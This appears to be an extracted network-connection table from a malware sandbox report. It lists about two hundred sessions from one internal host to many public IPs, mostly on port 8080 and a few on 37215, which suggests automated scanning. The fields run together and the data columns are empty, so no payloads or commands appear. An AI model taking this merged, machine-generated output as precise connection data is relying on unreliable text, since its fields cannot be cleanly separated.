                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16148192.168.2.2349992213.79.87.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16149192.168.2.2354652175.136.157.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16150192.168.2.234231873.166.3.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16151192.168.2.233940425.126.254.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16152192.168.2.236054671.74.172.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16153192.168.2.233930489.188.0.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16154192.168.2.2348770169.178.160.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16155192.168.2.2335408217.72.16.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16156192.168.2.234638843.45.50.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16157192.168.2.2353854146.178.23.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16158192.168.2.2358230183.17.101.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16159192.168.2.235055693.43.100.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16160192.168.2.235530425.97.59.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16161192.168.2.235216095.17.95.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16162192.168.2.2359078109.93.170.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16163192.168.2.2356574206.82.102.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16164192.168.2.2354410119.16.227.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16165192.168.2.2340882188.128.37.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16166192.168.2.236022472.156.221.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16167192.168.2.2351932142.73.217.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16168192.168.2.2349098178.34.173.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16169192.168.2.233576897.233.75.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16170192.168.2.2358422128.167.254.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16171192.168.2.2339254160.75.198.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16172192.168.2.2348412191.170.37.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16173192.168.2.2356028187.250.149.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16174192.168.2.2356744167.35.73.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16175192.168.2.2349136170.91.88.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16176192.168.2.234043679.21.88.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16177192.168.2.235446644.178.155.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16178192.168.2.2335144138.30.204.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16179192.168.2.2343540132.152.212.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16180192.168.2.235206676.47.179.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16181192.168.2.236090652.238.90.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16182192.168.2.233666417.15.250.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16183192.168.2.2348066223.25.126.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16184192.168.2.234731619.210.20.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16185192.168.2.2337134109.70.103.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16186192.168.2.2346072115.160.178.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16187192.168.2.235042469.16.165.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16188192.168.2.2351002182.0.181.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16189192.168.2.2347664100.32.202.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16190192.168.2.2350416180.127.194.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16191192.168.2.235139831.112.5.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16192192.168.2.2354984171.38.44.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16193192.168.2.2352586211.67.198.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16194192.168.2.2340030101.149.210.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16195192.168.2.2341464222.238.202.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16196192.168.2.2349462181.115.99.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16197192.168.2.2340544137.138.153.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16198192.168.2.2359286115.110.218.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16199192.168.2.2341324182.188.6.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16200192.168.2.234021050.72.149.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16201192.168.2.234828871.154.80.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16202192.168.2.2351826184.105.193.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16203192.168.2.233799827.138.214.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16204192.168.2.234796823.155.75.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16205192.168.2.2346610103.241.163.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16206192.168.2.233913048.139.74.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16207192.168.2.2353326165.218.168.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16208192.168.2.23589928.86.186.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16209192.168.2.235149060.56.12.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16210192.168.2.2356774100.205.211.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16211192.168.2.235040299.136.96.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16212192.168.2.2335878156.183.120.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16213192.168.2.2341966216.35.110.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16214192.168.2.2334612190.228.65.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16215192.168.2.2352016114.130.90.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16216192.168.2.2345526147.159.213.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16217192.168.2.2349214201.111.94.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16218192.168.2.2351596186.93.0.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16219192.168.2.2357270217.81.52.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16220192.168.2.2349822186.37.2.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16221192.168.2.2340914114.247.252.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16222192.168.2.234747086.118.134.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16223192.168.2.2342728194.201.139.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16224192.168.2.2348862155.181.108.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16225192.168.2.235491663.67.126.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16226192.168.2.2336390176.158.224.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16227192.168.2.2347502197.5.98.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16228192.168.2.234083441.157.120.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16229192.168.2.234486287.68.224.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16230192.168.2.2350490150.49.8.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16231192.168.2.234993837.72.132.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16232192.168.2.2337552157.241.75.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16233192.168.2.2358240157.198.91.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16234192.168.2.234853835.72.66.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16235192.168.2.2342282218.236.225.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16236192.168.2.2348266114.227.52.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16237192.168.2.234450236.1.243.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16238192.168.2.233360250.64.217.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16239192.168.2.234839225.152.19.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16240192.168.2.233821066.78.151.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16241192.168.2.233649881.42.127.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16242192.168.2.2337620168.213.68.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16243192.168.2.2342738112.210.73.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16244192.168.2.2349230202.91.92.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16245192.168.2.2335564129.21.171.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16246192.168.2.233910437.65.132.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16247192.168.2.235606614.170.118.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16248192.168.2.2348398133.103.159.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16249192.168.2.2360596170.80.30.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16250192.168.2.235063266.145.236.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16251192.168.2.2359048158.7.157.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16252192.168.2.2350430144.18.26.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16253192.168.2.2337730221.43.35.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16254192.168.2.2346316124.224.4.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16255192.168.2.2343810123.58.39.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16256192.168.2.2336730167.96.224.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16257192.168.2.2343942104.197.234.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16258192.168.2.2351962203.109.159.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16259192.168.2.2341360223.60.120.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16260192.168.2.2343688164.116.193.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16261192.168.2.2339438149.162.110.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16262192.168.2.236085432.70.125.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16263192.168.2.2344020188.191.163.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16264192.168.2.234736478.103.165.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16265192.168.2.2354212163.190.105.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16266192.168.2.2338948223.233.65.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16267192.168.2.2360554133.163.0.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16268192.168.2.2359898130.15.22.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16269192.168.2.2360240168.149.39.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16270192.168.2.233585487.87.72.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16271192.168.2.2343294200.68.113.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16272192.168.2.236037453.100.180.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16273192.168.2.2354006161.234.115.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16274192.168.2.2341344131.28.219.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16275192.168.2.233905436.152.196.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16276192.168.2.2348068100.145.99.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16277192.168.2.233630852.158.254.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16278192.168.2.233578212.146.217.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16279192.168.2.2348552223.164.225.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16280192.168.2.2358570135.133.125.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16281192.168.2.2340854176.74.149.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16282192.168.2.2341606105.206.164.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16283192.168.2.234164267.111.58.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16284192.168.2.2336752154.216.178.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16285192.168.2.2345864210.98.61.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16286192.168.2.2342938175.23.164.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16287192.168.2.233950846.55.187.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16288192.168.2.2355192137.7.164.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16289192.168.2.2359570219.186.81.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16290192.168.2.2360282189.124.169.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16291192.168.2.2346510177.183.130.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16292192.168.2.2338060115.223.59.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16293192.168.2.2337922218.183.183.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16294192.168.2.2357770132.169.58.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16295192.168.2.2349704171.71.140.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16296192.168.2.2336910176.80.95.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16297192.168.2.23491765.15.164.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16298192.168.2.236021468.74.218.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16299192.168.2.234129251.34.18.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16300192.168.2.235305654.249.14.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16301192.168.2.234627682.235.197.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16302192.168.2.2352796144.129.237.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16303192.168.2.2346692165.18.207.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16304192.168.2.2351060123.216.19.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16305192.168.2.2347318213.81.5.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16306192.168.2.2351764184.130.75.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16307192.168.2.2360116116.29.47.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16308192.168.2.2343240135.35.96.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16309192.168.2.2337734131.62.39.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16310192.168.2.2336868211.163.97.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16311192.168.2.2341298176.211.71.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16312192.168.2.2338036145.209.58.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16313192.168.2.235383091.143.172.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16314192.168.2.2342962124.183.36.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16315192.168.2.2349612103.135.60.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16316192.168.2.2334728219.215.54.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16317192.168.2.234958625.182.112.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16318192.168.2.2358364196.123.223.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16319192.168.2.2359690144.89.43.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16320192.168.2.233745818.92.233.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16321192.168.2.234188458.89.65.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16322192.168.2.2353148145.216.159.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16323192.168.2.2344030206.123.11.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16324192.168.2.234455278.61.51.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16325192.168.2.2346672176.238.125.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16326192.168.2.234374643.105.222.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16327192.168.2.2359818222.80.114.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16328192.168.2.234121487.11.178.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16329192.168.2.235674094.4.136.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16330192.168.2.2352500184.130.74.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16331192.168.2.2350582176.217.125.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16332192.168.2.234371685.113.228.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16333192.168.2.2355732103.231.73.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16334192.168.2.2359140166.213.186.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16335192.168.2.2352848202.179.162.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16336192.168.2.2360754112.199.85.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16337192.168.2.2358974129.65.13.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16338192.168.2.234487038.246.168.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16339192.168.2.2334050202.109.164.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16340192.168.2.234471223.198.157.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16341192.168.2.2347898152.50.223.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16342192.168.2.234111258.14.109.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16343192.168.2.233911092.19.70.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16344192.168.2.234892281.43.213.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16345192.168.2.2345040188.203.6.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16346192.168.2.2352648181.132.56.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16347192.168.2.235974685.34.218.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16348192.168.2.233645412.10.222.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16349192.168.2.2353166169.145.75.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16350192.168.2.2339522209.236.19.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16351192.168.2.2334310105.223.116.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16352192.168.2.2347946145.218.175.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16353192.168.2.235482893.164.6.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16354192.168.2.235819295.149.125.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16355192.168.2.2360560102.96.88.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16356192.168.2.2346222156.192.166.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16357192.168.2.2357710198.96.28.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
